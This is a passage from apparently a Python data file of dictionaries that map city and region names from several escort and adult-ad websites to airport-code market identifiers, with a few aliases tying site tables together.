"Central Michigan, Michigan": "LAN",
"Chambana, Illinois": "CMI",
"Chambersburg, Pennsylvania": "N68",
"Charleston, South Carolina": "CHS",
"Charleston, West Virginia": "CRW",
"Charlotte, North Carolina": "CLT",
"Charlottesville, Virginia": "CHO",
"Chatham, Ontario": "XCM",
"Chattanooga, Tennessee": "CHA",
"Chautauqua, New York": "JHW",
"Chesapeake, Virginia": "ORF",
"Chicago, Illinois": "ORD",
"Chico, California": "CIC",
"Chillicothe, Ohio": "RZT",
"Cincinnati, Ohio": "CVG",
"Cleveland, Ohio": "CLE",
"College Station, Texas": "CLL",
"Colorado Springs, Colorado": "COS",
"Columbia, Missouri": "COU",
"Columbia, South Carolina": "CAE",
"Columbus, Ohio": "CMH",
"Comox Valley, British Columbia": "YQQ",
"Cornwall, Ontario": "YCC",
"Corpus Christi, Texas": "CRP",
"Corvallis, Oregon": "CVO",
"Cranbrook, British Columbia": "YXC",
"Cumberland Valley, Maryland": "CBE",
"Dallas, Texas": "DFW",
"Danville, Virginia": "DAN",
"Dayton, Ohio": "DAY",
"Daytona, Florida": "DAB",
"Decatur, Illinois": "DEC",
"Denton, Texas": "DFW",
"Denver, Colorado": "DEN",
"Des Moines, Iowa": "DSM",
"Detroit, Michigan": "DTW",
"Dothan, Alabama": "DHN",
"Dubuque, Iowa": "DBQ",
"Duluth, Minnesota": "DLH",
"East Bay, California": "OAK",
"East Idaho, Idaho": "IDA",
"East Kentucky, Kentucky": "PBX",
"East Oregon, Oregon": "PDT",
"Eastern Connecticut, Connecticut": "GOT",
"Eastern NC, North Carolina": "PGV",
"Eastern Shore, Maryland": "SBY",
"Eauclaire, Wisconsin": "EAU",
"Edmonton, Alberta": "YEG",
"El Paso, Texas": "ELP",
"Elmira, New York": "ELM",
"Erie, Pennsylvania": "ERI",
"Eugene, Oregon": "EUG",
"Evansville, Indiana": "EVV",
"Everett, Washington": "PAE",
"Fargo, North Dakota": "FAR",
"Fayetteville, North Carolina": "FAY",
"Finger Lakes, New York": "D82",
"Flagstaff, Arizona": "FLG",
"Flint, Michigan": "FNT",
"Florence, South Carolina": "FLO",
"Fort Collins, Colorado": "FNL",
"Fort Dodge, Iowa": "FOD",
"Fort Mcmurray, Alberta": "YMM",
"Fort Myers, Florida": "RSW",
"Fort Smith, Arkansas": "FSM",
"Fort Wayne, Indiana": "FWA",
"Frederick, Maryland": "FDK",
"Fredericksburg, Virginia": "EZF",
"Fresno, California": "FAT",
"Ft Lauderdale, Florida": "FLL",
"Gadsden, Alabama": "GAD",
"Gainesville, Florida": "GNV",
"Galveston, Texas": "GLS",
"Glens Falls, New York": "GFL",
"Grand Island, Nebraska": "GRI",
"Grand Rapids, Michigan": "GRR",
"Green Bay, Wisconsin": "GRB",
"Greensboro, North Carolina": "GSO",
"Greenville, South Carolina": "GSP",
"Guelph, Ontario": "CNC4",
"Hamilton, Ontario": "YHM",
"Hampton, Virginia": "ORF",
"Harrisburg, Pennsylvania": "MDT",
"Harrisonburg, Virginia": "SHD",
"Hartford, Connecticut": "HFD",
"Hattiesburg, Mississippi": "HBG",
"Hickory, North Carolina": "HKY",
"Hilton Head, South Carolina": "HHH",
"Honolulu, Hawaii": "HNL",
"Houston, Texas": "IAH",
"Hudson Valley, New York": "SWF",
"Humboldt County, California": "ACV",
"Huntington, West Virginia": "HTS",
"Huntsville, Alabama": "HSV",
"Huntsville, Texas": "UTS",
"Indianapolis, Indiana": "IND",
"Inland Empire, California": "ONT",
"Iowa City, Iowa": "IOW",
"Ithaca, New York": "ITH",
"Jackson, Mississippi": "JAN",
"Jacksonville, Florida": "JAX",
"Janesville, Wisconsin": "JVL",
"Jersey Shore, New Jersey": "ACY",
"Jonesboro, Arkansas": "JBR",
"Joplin, Missouri": "JLN",
"Kalamazoo, Michigan": "AZO",
"Kamloops, British Columbia": "YKA",
"Kansas City, Missouri": "MCI",
"Kauai, Hawaii": "LIH",
"Kelowna, British Columbia": "YLW",
"Keys, Florida": "EYW",
"Killeen, Texas": "GRK",
"Kingston, Ontario": "YGK",
"Kirksville, Missouri": "IRK",
"Kitchener, Ontario": "YKF",
"Knoxville, Tennessee": "TYS",
"Kokomo, Indiana": "OKK",
"La Crosse, Wisconsin": "",
"LaSalle, Illinois": "VYS",
"Lafayette, Louisiana": "LFT",
"Lake Charles, Louisiana": "LCH",
"Lake Of The Ozarks, Missouri": "AIZ",
"Lakeland, Florida": "LAL",
"Lancaster, Pennsylvania": "LNS",
"Lansing, Michigan": "LAN",
"Laredo, Texas": "LRD",
"Las Vegas, Nevada": "LAS",
"Lawrence, Kansas": "LWC",
"Lawton, Oklahoma": "LAW",
"Lethbridge, Alberta": "YQL",
"Lewiston, Idaho": "LWS",
"Lexington, Kentucky": "LEX",
"Lima, Ohio": "LIM",
"Little Rock, Arkansas": "LIT",
"Logan, Utah": "LGU",
"London, Ontario": "YXU",
"Long Beach, California": "LGB",
"Los Angeles, California": "LAX",
"Louisville, Kentucky": "SDF",
"Lubbock, Texas": "LBB",
"Lynchburg, Virginia": "LYH",
"Macon, Georgia": "MCN",
"Madison, Wisconsin": "MSN",
"Manchester, New Hampshire": "MHT",
"Manhattan, Kansas": "MHK",
"Mankato, Minnesota": "MKT",
"Mansfield, Ohio": "MFD",
"Martinsburg, West Virginia": "MRB",
"Mason City, Iowa": "MCW",
"Mattoon, Illinois": "MTO",
"Maui, Hawaii": "OGG",
"Mcallen, Texas": "MFE",
"Meadville, Pennsylvania": "GKJ",
"Medford, Oregon": "MFR",
"Memphis, Tennessee": "MEM",
"Mendocino, California": "UKI",
"Merced, California": "MCE",
"Meridian, Mississippi": "MEI",
"Miami, Florida": "MIA",
"Milwaukee, Wisconsin": "MKE",
"Minneapolis, Minnesota": "MSP",
"Mobile, Alabama": "MOB",
"Modesto, California": "MOD",
"Mohave, Arizona": "IFP",
"Monroe, Michigan": "TTF",
"Monterey, California": "MRY",
"Montgomery, Alabama": "MGM",
"Montreal, Quebec": "YUL",
"Morgantown, West Virginia": "MGW",
"Moses Lake, Washington": "MWH",
"Muncie, Indiana": "MIE",
"Muskegon, Michigan": "MKG",
"Myrtle Beach, South Carolina": "MYR",
"Nanaimo, British Columbia": "YCD",
"Nashville, Tennessee": "BNA",
"Natchez, Mississippi": "HEZ",
"New Haven, Connecticut": "HVN",
"New Orleans, Louisiana": "MSY",
"New York, New York": "JFK",
"Newport News, Virginia": "ORF",
"Niagara, Ontario": "YCM",
"Norfolk, Virginia": "ORF",
"North Jersey, New Jersey": "EWR",
"North Platte, Nebraska": "LBF",
"Northern Michigan, Michigan": "TVC",
"Northern Mississippi, Mississippi": "TUP",
"Northern Virginia, Dc": "IAD",
"Northwest Connecticut, Connecticut": "DXR",
"Northwest Georgia, Georgia": "RMG",
"Ocala, Florida": "OCF",
"Odessa, Texas": "MAF",
"Ogden, Utah": "OGD",
"Oklahoma City, Oklahoma": "OKC",
"Olympia, Washington": "TCM",
"Omaha, Nebraska": "OMA",
"Oneonta, New York": "ONH",
"Orange County, California": "SNA",
"Oregon Coast, Oregon": "ONP",
"Orlando, Florida": "MCO",
"Ottawa, Ontario": "YOW",
"Ottumwa, Iowa": "OTM",
"Outer Banks, North Carolina": "FFA",
"Owen Sound, Ontario": "YOS",
"Owensboro, Kentucky": "OWB",
"Palmdale, California": "PMD",
"Palms Prings, California": "PSP",
"Panama City, Florida": "PFN",
"Parkersburg, West Virginia": "PKB",
"Pennstate, Pennsylvania": "UNV",
"Pensacola, Florida": "PNS",
"Peoria, Illinois": "PIA",
"Peterborough, Ontario": "YPQ",
"Philadelphia, Pennsylvania": "PHL",
"Phoenix, Arizona": "PHX",
"Pittsburgh, Pennsylvania": "PIT",
"Plattsburgh, New York": "PBG",
"Poconos, Pennsylvania": "MPO",
"Port Huron, Michigan": "PHN",
"Portland, Oregon": "PDX",
"Portsmouth, Maine": "PWM",
"Portsmouth, Virginia": "ORF",
"Potsdam, New York": "PTD",
"Prescott, Arizona": "PRC",
"Prince George, British Columbia": "YXS",
"Provo, Utah": "PVU",
"Pueblo, Colorado": "PUB",
"Puerto Rico, Puerto Rico": "SJU",
"Pullman, Washington": "PUW",
"Quad Cities, Iowa": "MLI",
"Quebec, Quebec": "YQB",
"Quincy, Illinois": "UIN",
"Racine, Wisconsin": "RAC",
"Raleigh, North Carolina": "RDU",
"Reading, Pennsylvania": "RDG",
"Red Deer, Alberta": "YQF",
"Redding, California": "RDD",
"Regina, Saskatchewan": "YQR",
"Reno, Nevada": "RNO",
"Richmond, Virginia": "RIC",
"Riverside, California": "ONT",
"Roanoke, Virginia": "ROA",
"Rochester, New York": "ROC",
"Rockford, Illinois": "RFD",
"Rockies, Colorado": "EGE",
"Roseburg, Oregon": "RBG",
"ST. Augustine, Florida": "UST",
"Sacramento, California": "SMF",
"Saginaw, Michigan": "MBS",
"Saguenay, Quebec": "YBG",
"Salem, North Carolina": "INT",
"Salem, Oregon": "SLE",
"Salt Lake City, Utah": "SLC",
"San Antonio, Texas": "SAT",
"San Bernardino, California": "ONT",
"San Diego, California": "SAN",
"San Fernando, California": "BUR",
"San Francisco, California": "SFO",
"San Jose, California": "SJC",
"San Luis Obispo, California": "SBP",
"San Marcos, Texas": "HYI",
"Sandusky, Ohio": "SKY",
"Santa Barbara, California": "SBA",
"Santa Cruz, California": "WVI",
"Santa Maria, California": "SMX",
"Santafe, New Mexico": "SAF",
"Sarasota, Florida": "SRQ",
"Sarnia, Ontario": "YZR",
"Saskatoon, Saskatchewan": "YXE",
"Sault, Ontario": "YAM",
"Savannah, Georgia": "SAV",
"Scotts Bluff, Nebraska": "BFF",
"Scranton, Pennsylvania": "AVP",
"Seattle, Washington": "SEA",
"Sheboygan, Wisconsin": "SBM",
"Sherbrooke, Quebec": "YSC",
"Shoals, Alabama": "MSL",
"Showlow, Arizona": "SOW",
"Shreveport, Louisiana": "SHV",
"Sierra Vista, Arizona": "FHU",
"Sioux City, Iowa": "SUX",
"Siskiyou, California": "SIY",
"Skeena, British Columbia": "XCM",
"South Bend, Indiana": "SBN",
"South Coast, Massachusetts": "EWB",
"South Jersey, New Jersey": "MIV",
"Southeast Missouri, Missouri": "CGI",
"Southern Maryland, Dc": "2W6",
"Southern West Virgin, West Virginia": "BKW",
"Southwest Michigan, Michigan": "BEH",
"Southwest Virginia, Virginia": "MKJ",
"Space Coast, Florida": "TIX",
"Spokane, Washington": "GEG",
"Springfield, Illinois": "SPI",
"Springfield, Massachusetts": "CEF",
"Springfield, Missouri": "SGF",
"St Cloud, Minnesota": "STC",
"St George, Utah": "SGU",
"St Joseph, Missouri": "STJ",
"St Louis, Missouri": "STL",
"Statesboro, Georgia": "TBR",
"Stillwater, Oklahoma": "SWO",
"Sudbury, Ontario": "YSB",
"Suffolk, Virginia": "ORF",
"Sunshine, British Columbia": "YHS",
"Susanville, California": "SVE",
"Syracuse, New York": "SYR",
"Tacoma, Washington": "TCM",
"Tallahassee, Florida": "TLH",
"Tampa, Florida": "TPA",
"Terre Haute, Indiana": "HUF",
"Texarkana, Texas": "TXK",
"Texoma, Texas": "GYI",
"Thunderbay, Ontario": "YQT",
"Toledo, Ohio": "TOL",
"Topeka, Kansas": "FOE",
"Toronto, Ontario": "YYZ",
"Treasure Coast, Florida": "VRB",
"Tri Cities, Washington": "PSC",
"Trois Rivieres, Quebec": "YRQ",
"Tucson, Arizona": "TUS",
"Tulsa, Oklahoma": "TUL",
"Tuscaloosa, Alabama": "TCL",
"Tuscarawas, Ohio": "PHD",
"Twin Falls, Idaho": "TWF",
"Twintiers, New York": "OLE",
"Tyler, Texas": "TYR",
"Upper Peninsula, Michigan": "MQT",
"Utica, New York": "UCA",
"Valdosta, Georgia": "VLD",
"Vancouver, British Columbia": "YVR",
"Ventura, California": "OXR",
"Victoria, British Columbia": "YYJ",
"Virginia Beach, Virginia": "ORF",
"Visalia, California": "VIS",
"Waco, Texas": "ACT",
"Washington DC, Dc": "IAD",
"Waterloo, Iowa": "ALO",
"Watertown, New York": "ART",
"Wausau, Wisconsin": "AUW",
"Wenatchee, Washington": "EAT",
"West Kentucky, Kentucky": "PAH",
"West Palm Beach, Florida": "PBI",
"West Slope, Colorado": "GJT",
"Western Maryland, Maryland": "CBE",
"Wheeling, West Virginia": "HLG",
"Whistler, British Columbia": "YWS",
"Wichita Falls, Texas": "SPS",
"Wichita, Kansas": "ICT",
"Williamsport, Pennsylvania": "IPT",
"Wilmington, North Carolina": "ILM",
"Windsor, Ontario": "YQG",
"Worcester, Massachusetts": "ORH",
"Yakima, Washington": "YKM",
"York, Pennsylvania": "THV",
"Youngstown, Ohio": "YNG",
"Yuma, Arizona": "YUM",
"Zanesville, Ohio": "ZZV"}
# escortphonelist_sitekey_to_marketid
escortphonelist_sitekey_to_marketid = escortsincollege_sitekey_to_marketid
# eroticmugshots_massagetroll_sitekey_to_marketid
eroticmugshots_massagetroll_sitekey_to_marketid = {
"abbotsford": "YXX",
"aberdeen": "ABZ",
"abilene": "ABI",
"adelaide": "ADL",
"akron": "CAK",
"albany": "ALB",
"albuquerque": "ABQ",
"allentown": "ABE",
"altoona": "AOO",
"amarillo": "AMA",
"anchorage": "ANC",
"annapolis": "ANP",
"annarbor": "ARB",
"appleton": "ATW",
"asheville": "AVL",
"ashland": "MFR",
"ashtabula": "HZY",
"athens": "ATO",
"atlanta": "ATL",
"auburn": "AUO",
"augusta": "AGS",
"austin": "AUS",
"bakersfield": "BFL",
"baltimore": "BWI",
"barrie": "QEB",
"batonrouge": "BTR",
"battlecreek": "AZO",
"beaumont": "BPT",
"belleville": "YTR",
"bellingham": "BLI",
"bend": "RDM",
"bigisland": "KOA",
"biloxi": "GPT",
"binghamton": "BGM",
"birmingham": "BHM",
"birminghamuk": "BHX",
"blacksburg": "BCB",
"bloomington": "BMG",
"boise": "BOI",
"boone": "NC06",
"boston": "BOS",
"boulder": "WBU",
"bowlinggreen": "BWG",
"brantford": "YFD",
"brighton": "ESH",
"brisbane": "BNE",
"bristol": "BRS",
"brownsville": "BRO",
"brunswick": "BQK",
"buffalo": "BUF",
"calgary": "YYC",
"cambridge": "CBG",
"canberra": "CBR",
"capecod": "PVC",
"carbondale": "MDH",
"cariboo": "YXS",
"catskills": "20N",
"cedarrapids": "CID",
"centralmichigan": "LAN",
"chambana": "CMI",
"chambersburg": "N68",
"charlestonsc": "CHS",
"charlestonwv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chatham": "XCM",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chesapeake": "ORF",
"chicago": "ORD",
"chico": "CIC",
"chillicothe": "RZT",
"cincinnati": "CVG",
"cleveland": "CLE",
"collegestation": "CLL",
"coloradosprings": "COS",
"columbia": "COU",
"columbiasc": "CAE",
"columbus": "CMH",
"comoxvalley": "YQQ",
"cornwall": "YCC",
"corpuschristi": "CRP",
"corvallis": "CVO",
"cranbrook": "YXC",
"cumberlandvalley": "N68",
"dallas": "DFW",
"danville": "DAN",
"dayton": "DAY",
"daytona": "DAY",
"decatur": "DEC",
"denton": "DFW",
"denver": "DEN",
"desmoines": "DSM",
"detroit": "DTW",
"devon": "EXT",
"dothan": "DHN",
"dubuque": "DBQ",
"duluth": "DLH",
"eastanglia": "NWI",
"eastbay": "OAK",
"easternconnecticut": "GON",
"easternnc": "PGV",
"easternshore": "SBY",
"eastidaho": "IDA",
"eastkentucky": "PBX",
"eastmidlands": "EMA",
"eastoregon": "PDT",
"eauclaire": "EAU",
"edinburgh": "EDI",
"edmonton": "YEG",
"elmira": "ELM",
"elpaso": "ELP",
"erie": "ERI",
"eugene": "EUG",
"evansville": "EVV",
"everett": "PAE",
"fargo": "FAR",
"fayetteville": "FAY",
"fingerlakes": "D82",
"flagstaff": "FLG",
"flint": "FNT",
"florence": "FLO",
"fortcollins": "FNL",
"fortdodge": "FOD",
"fortmcmurray": "YMM",
"fortmyers": "RSW",
"fortsmith": "FSM",
"fortwayne": "FWA",
"frederick": "FDK",
"fredericksburg": "EZF",
"fresno": "FAT",
"ftlauderdale": "FLL",
"gadsden": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"glasgow": "GLA",
"glensfalls": "GFL",
"grandisland": "GRI",
"grandrapids": "GRR",
"greenbay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"guelph": "CNC4",
"hamilton": "YHM",
"hampshire": "SOU",
"hampton": "ORF",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hattiesburg": "HBG",
"hickory": "HKY",
"hiltonhead": "HHH",
"honolulu": "HNL",
"houston": "IAH",
"hudsonvalley": "SWF",
"humboldt": "HJO",
"huntington": "HTS",
"huntsville": "HSV",
"huntsvilletx": "UTS",
"indianapolis": "IND",
"inlandempire": "ONT",
"iowacity": "IOW",
"ithaca": "ITH",
"jackson": "JAN",
"jacksonville": "JAX",
"janesville": "JVL",
"jerseyshore": "ACY",
"jonesboro": "JBR",
"joplin": "JLN",
"kalamazoo": "AZO",
"kamloops": "YKA",
"kansascity": "MCI",
"kauai": "LIH",
"kelowna": "YLW",
"keys": "EYW",
"killeen": "GRK",
"kingston": "YGK",
"kirksville": "IRK",
"kitchener": "YKF",
"knoxville": "TYS",
"kokomo": "OKK",
"lacrosse": "LSE",
"lafayette": "LFT",
"lakecharles": "LCH",
"lakeland": "LAL",
"lakeoftheozarks": "AIZ",
"lancaster": "LNS",
"lansing": "LAN",
"laredo": "LRD",
"lasalle": "VYS",
"lasvegas": "LAS",
"lawrence": "LWC",
"lawton": "LAW",
"leeds": "LBA",
"lethbridge": "YQL",
"lewiston": "LWS",
"lexington": "LEX",
"lima": "AOH",
"littlerock": "LIT",
"liverpool": "LPL",
"logan": "LGU",
"londonon": "YXU",
"londonuk": "LHR",
"longbeach": "LGB",
"losangeles": "LAX",
"louisville": "SDF",
"lubbock": "LBB",
"lynchburg": "LYH",
"macon": "MCN",
"madison": "MSN",
"manchester": "MAN",
"manchesternh": "MHT",
"manhattan": "MHK",
"mankato": "MKT",
"mansfield": "MFD",
"martinsburg": "MRB",
"masoncity": "MCW",
"mattoon": "MTO",
"maui": "OGG",
"mcallen": "MFE",
"meadville": "GKJ",
"medford": "MFR",
"melbourne": "MEL",
"memphis": "MEM",
"mendocino": "UKI",
"merced": "MCE",
"meridian": "MEI",
"miami": "MIA",
"milwaukee": "MKE",
"minneapolis": "MSP",
"mobile": "MOB",
"modesto": "MOD",
"mohave": "IFP",
"monroe": "TTF",
"monterey": "MRY",
"montgomery": "MGM",
"montreal": "YUL",
"morgantown": "MGW",
"moseslake": "MWH",
"muncie": "MIE",
"muskegon": "MKG",
"myrtlebeach": "MYR",
"nanaimo": "YCD",
"nashville": "BNA",
"natchez": "HEZ",
"newcastle": "NCL",
"newhaven": "HVN",
"neworleans": "MSY",
"newportnews": "ORF",
"newyork": "JFK",
"niagara": "YCM",
"norfolk": "ORF",
"northernmichigan": "TVC",
"northernmississippi": "TUP",
"northjersey": "EWR",
"northplatte": "LBF",
"northwestconnecticut": "DXR",
"northwestgeorgia": "RMG",
"nova": "IAD",
"ocala": "OCF",
"odessa": "MAF",
"ogden": "OGD",
"oklahomacity": "OKC",
"olympia": "TCM",
"omaha": "OMA",
"oneonta": "ONH",
"orangecounty": "SNA",
"oregoncoast": "ONP",
"orlando": "MCO",
"ottawa": "YOW",
"ottumwa": "OTM",
"outerbanks": "FFA",
"owensboro": "OWB",
"owensound": "YOS",
"oxford": "OXF",
"palmdale": "PMD",
"palmsprings": "PSP",
"panamacity": "PFN",
"parkersburg": "PKB",
"pennstate": "UNV",
"pensacola": "PNS",
"peoria": "PIA",
"perth": "PER",
"peterborough": "YPQ",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh": "PBG",
"poconos": "MPO",
"porthuron": "PHN",
"portland": "PDX",
"portsmouth": "ORF",
"portsmouthme": "PWM",
"potsdam": "MSS",
"prescott": "PRC",
"princegeorge": "YXS",
"provo": "PVU",
"pueblo": "PUB",
"puertorico": "SJU",
"pullman": "PUW",
"quadcities": "MLI",
"quebec": "YQB",
"quincy": "UIN",
"racine": "RAC",
"raleigh": "RDU",
"reading": "RDG",
"reddeer": "YQF",
"redding": "RDD",
"reno": "RNO",
"richmond": "RIC",
"riverside": "ONT",
"roanoke": "ROA",
"rochester": "ROC",
"rockford": "RFD",
"rockies": "EGE",
"roseburg": "RBG",
"sacramento": "SMF",
"saginaw": "MBS",
"salem": "SLE",
"saltlakecity": "SLC",
"sanantonio": "SAT",
"sanbernardino": "ONT",
"sandiego": "SAN",
"sandusky": "SKY",
"sanfernandovalley": "BUR",
"sanfrancisco": "SFO",
"sanjose": "SJC",
"sanluisobispo": "SBP",
"sanmarcos": "HYI",
"santabarbara": "SBA",
"santacruz": "WVI",
"santafe": "SAF",
"santamaria": "SMX",
"sarasota": "SRQ",
"sarnia": "YZR",
"saskatoon": "YXE",
"sault": "YAM",
"savannah": "SAV",
"scottsbluff": "BFF",
"scranton": "AVP",
"seattle": "SEA",
"sheboygan": "SBM",
"sheffield": "DSA",
"shoals": "MSL",
"showlow": "SOW",
"shreveport": "SHV",
"sierravista": "FHU",
"siouxcity": "SUX",
"siskiyou": "SIY",
"skeena": "XCM",
"southbend": "SBN",
"southcoast": "EWB",
"southeastmissouri": "CGI",
"southernmaryland": "2W6",
"southernwestvirginia": "BKW",
"southjersey": "MIV",
"southwestmichigan": "BEH",
"spacecoast": "TIX",
"spokane": "GEG",
"springfield": "CEF",
"springfieldmo": "SGF",
"statesboro": "TBR",
"staugustine": "UST",
"stcloud": "STC",
"stgeorge": "SGU",
"stillwater": "SWO",
"stjoseph": "STJ",
"stlouis": "STL",
"sudbury": "YSB",
"suffolk": "ORF",
"sunshine": "YHS",
"susanville": "SVE",
"swva": "MKJ",
"sydney": "SYD",
"syracuse": "SYR",
"tacoma": "TCM",
"tallahassee": "TLH",
"tampa": "TPA",
"terrehaute": "HUF",
"texarkana": "TXK",
"texoma": "GYI",
"thunderbay": "YQT",
"tijuana": "TIJ",
"toledo": "TOL",
"topeka": "FOE",
"toronto": "YYZ",
"treasurecoast": "VRB",
"tricities": "TRI",
"troisrivieres": "YRQ",
"tucson": "TUS",
"tulsa": "TUL",
"tuscaloosa": "TCL",
"tuscarawas": "PHD",
"twinfalls": "TWF",
"twintiers": "OLE",
"tyler": "TYR",
"upperpeninsula": "MQT",
"utica": "UCA",
"valdosta": "VLD",
"vancouver": "YVR",
"ventura": "OXR",
"victoria": "YYJ",
"virginiabeach": "ORF",
"visalia": "VIS",
"waco": "ACT",
"wales": "CWL",
"washingtondc": "IAD",
"waterloo": "YKF",
"watertown": "ART",
"wausau": "AUW",
"wenatchee": "EAT",
"westernmaryland": "CBE",
"westkentucky": "PAH",
"westpalmbeach": "PBI",
"westslope": "GJT",
"wheeling": "HLG",
"whistler": "YWS",
"wichita": "ICT",
"wichitafalls": "SPS",
"williamsport": "IPT",
"wilmington": "ILM",
"windsor": "YQG",
"winston": "INT",
"worcester": "ORH",
"yakima": "YKM",
"york": "THV",
"youngstown": "YNG",
"yuma": "YUM",
"zanesville": "ZZV",
# Massagetroll only
"canton": "CAK",
"centraljersey": "47N",
"findlay": "AOH",
"springfieldil": "SPI",
"stpaul": "MSP"
}
eroticmugshots_sitekey_to_marketid = eroticmugshots_massagetroll_sitekey_to_marketid
massagetroll_sitekey_to_marketid = eroticmugshots_massagetroll_sitekey_to_marketid
# escortadsxxx_sitekey_to_marketid
escortadsxxx_sitekey_to_marketid = {
("Abbotsford", "British Columbia"): "YXX",
("Aberdeen", "Uk"): "ABZ",
("Abilene", "Texas"): "ABI",
("Adelaide", "Australia"): "ADL",
("Akron", "Ohio"): "CAK",
("Albany", "New York"): "ALB",
("Albuquerque", "New Mexico"): "ABQ",
("Allentown", "Pennsylvania"): "ABE",
("Altoona", "Pennsylvania"): "AOO",
("Amarillo", "Texas"): "AMA",
("Anchorage", "Alaska"): "ANC",
("Ann Arbor", "Michigan"): "ARB",
("Annapolis", "Maryland"): "ANP",
("Appleton", "Wisconsin"): "ATW",
("Asheville", "North Carolina"): "AVL",
("Ashland", "Ohio"): "HTS",
("Ashtabula", "Ohio"): "HZY",
("Athens", "Ohio"): "ATO",
("Atlanta", "Georgia"): "ATL",
("Auburn", "Alabama"): "AUO",
("Augusta", "Georgia"): "AGS",
("Austin", "Texas"): "AUS",
("Bakersfield", "California"): "BFL",
("Baltimore", "Maryland"): "BWI",
("Barrie", "Ontario"): "QEB",
("Baton Rouge", "Louisiana"): "BTR",
("Battle Creek", "Michigan"): "AZO",
("Beaumont", "Texas"): "BPT",
("Belleville", "Ontario"): "YTR",
("Bellingham", "Washington"): "BLI",
("Bend", "Oregon"): "RDM",
("Bigisland", "Hawaii"): "KOA",
("Biloxi", "Mississippi"): "GPT",
("Binghamton", "New York"): "BGM",
("Birmingham", "Alabama"): "BHM",
("Birmingham", "Uk"): "BHX",
("Blacksburg", "Virginia"): "BCB",
("Bloomington", "Indiana"): "BMG",
("Boise", "Idaho"): "BOI",
("Boone", "North Carolina"): "NC06",
("Boston", "Massachusetts"): "BOS",
("Boulder", "Colorado"): "WBU",
("Bowling Green", "Kentucky"): "BWG",
("Brantford", "Ontario"): "YFD",
("Brighton", "Uk"): "ESH",
("Brisbane", "Australia"): "BNE",
("Bristol", "Uk"): "BRS",
("Brownsville", "Texas"): "BRO",
("Brunswick", "Georgia"): "BQK",
("Buffalo", "New York"): "BUF",
("Calgary", "Alberta"): "YYC",
("Cambridge", "Uk"): "CBG",
("Canberra", "Australia"): "CBR",
("Cape Cod", "Massachusetts"): "PVC",
("Carbondale", "Illinois"): "MDH",
("Cariboo", "British Columbia"): "YXS",
("Catskills", "New York"): "20N",
("Cedar Rapids", "Iowa"): "CID",
("Central Michigan", "Michigan"): "LAN",
("Chambana", "Illinois"): "CMI",
("Chambersburg", "Pennsylvania"): "N68",
("Charleston", "South Carolina"): "CHS",
("Charleston", "West Virginia"): "CRW",
("Charlottesville", "Virginia"): "CHO",
("Charlotte", "North Carolina"): "CLT",
("Chatham", "Ontario"): "XCM",
("Chattanooga", "Tennessee"): "CHA",
("Chautauqua", "New York"): "JHW",
("Chesapeake", "Virginia"): "ORF",
("Chicago", "Illinois"): "ORD",
("Chico", "California"): "CIC",
("Chillicothe", "Ohio"): "RZT",
("Cincinnati", "Ohio"): "CVG",
("Cleveland", "Ohio"): "CLE",
("College Station", "Texas"): "CLL",
("Colorado Springs", "Colorado"): "COS",
("Columbia", "Missouri"): "COU",
("Columbia", "South Carolina"): "CAE",
("Columbus", "Ohio"): "CMH",
("Comox Valley", "British Columbia"): "YQQ",
("Cornwall", "Ontario"): "YCC",
("Corpus Christi", "Texas"): "CRP",
("Corvallis", "Oregon"): "CVO",
("Cranbrook", "British Columbia"): "YXC",
("Cumberland Valley", "Maryland"): "CBE",
("Dallas", "Texas"): "DFW",
("Danville", "Virginia"): "DAN",
("Daytona", "Florida"): "DAB",
("Dayton", "Ohio"): "DAY",
("Decatur", "Illinois"): "DEC",
("Denton", "Texas"): "DFW",
("Denver", "Colorado"): "DEN",
("Des Moines", "Iowa"): "DSM",
("Detroit", "Michigan"): "DTW",
("Devon", "Uk"): "EXT",
("Dothan", "Alabama"): "DHN",
("Dubuque", "Iowa"): "DBQ",
("Duluth", "Minnesota"): "DLH",
("East Anglia", "Uk"): "NWI",
("East Bay", "California"): "OAK",
("East Idaho", "Idaho"): "IDA",
("East Kentucky", "Kentucky"): "PBX",
("East Midlands", "Uk"): "EMA",
("East Oregon", "Oregon"): "PDT",
("Eastern Connecticut", "Connecticut"): "GON",
("Eastern NC", "North Carolina"): "PGV",
("Eastern Shore", "Maryland"): "SBY",
("Eauclaire", "Wisconsin"): "EAU",
("Edinburgh", "Uk"): "EDI",
("Edmonton", "Alberta"): "YEG",
("El Paso", "Texas"): "ELP",
("Elmira", "New York"): "ELM",
("Erie", "Pennsylvania"): "ERI",
("Eugene", "Oregon"): "EUG",
("Evansville", "Indiana"): "EVV",
("Everett", "Washington"): "PAE",
("Fargo", "North Dakota"): "FAR",
("Fayetteville", "North Carolina"): "FAY",
("Finger Lakes", "New York"): "D82",
("Flagstaff", "Arizona"): "FLG",
("Flint", "Michigan"): "FNT",
("Florence", "South Carolina"): "FLO",
("Fort Collins", "Colorado"): "FNL",
("Fort Dodge", "Iowa"): "FOD",
("Fort Mcmurray", "Alberta"): "YMM",
("Fort Myers", "Florida"): "RSW",
("Fort Smith", "Arkansas"): "FSM",
("Fort Wayne", "Indiana"): "FWA",
("Fredericksburg", "Virginia"): "EZF",
("Frederick", "Maryland"): "FDK",
("Fresno", "California"): "FAT",
("Ft Lauderdale", "Florida"): "FLL",
("Gadsden", "Alabama"): "GAD",
("Gainesville", "Florida"): "GNV",
("Galveston", "Texas"): "GLS",
("Glasgow", "Uk"): "GLA",
("Glens Falls", "New York"): "GFL",
("Grand Island", "Nebraska"): "GRI",
("Grand Rapids", "Michigan"): "GRR",
("Green Bay", "Wisconsin"): "GRB",
("Greensboro", "North Carolina"): "GSO",
("Greenville", "South Carolina"): "GSP",
("Guelph", "Ontario"): "CNC4",
("Hamilton", "Ontario"): "YHM",
("Hampshire", "Uk"): "SOU",
("Hampton", "Virginia"): "ORF",
("Harrisburg", "Pennsylvania"): "MDT",
("Harrisonburg", "Virginia"): "SHD",
("Hartford", "Connecticut"): "HFD",
("Hattiesburg", "Mississippi"): "HBG",
("Hickory", "North Carolina"): "HKY",
("Hilton Head", "South Carolina"): "HHH",
("Honolulu", "Hawaii"): "HNL",
("Houston", "Texas"): "IAH",
("Hudson Valley", "New York"): "SWF",
("Humboldt County", "California"): "ACV",
("Huntington", "West Virginia"): "HTS",
("Huntsville", "Alabama"): "HSV",
